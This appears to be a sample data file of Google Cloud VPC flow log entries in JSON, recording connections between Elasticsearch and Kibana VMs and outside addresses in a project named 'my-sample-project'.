+{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"67.43.156.13","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"67.43.156.13","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"67.43.156.13","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"67.43.156.13","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"67.43.156.13","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 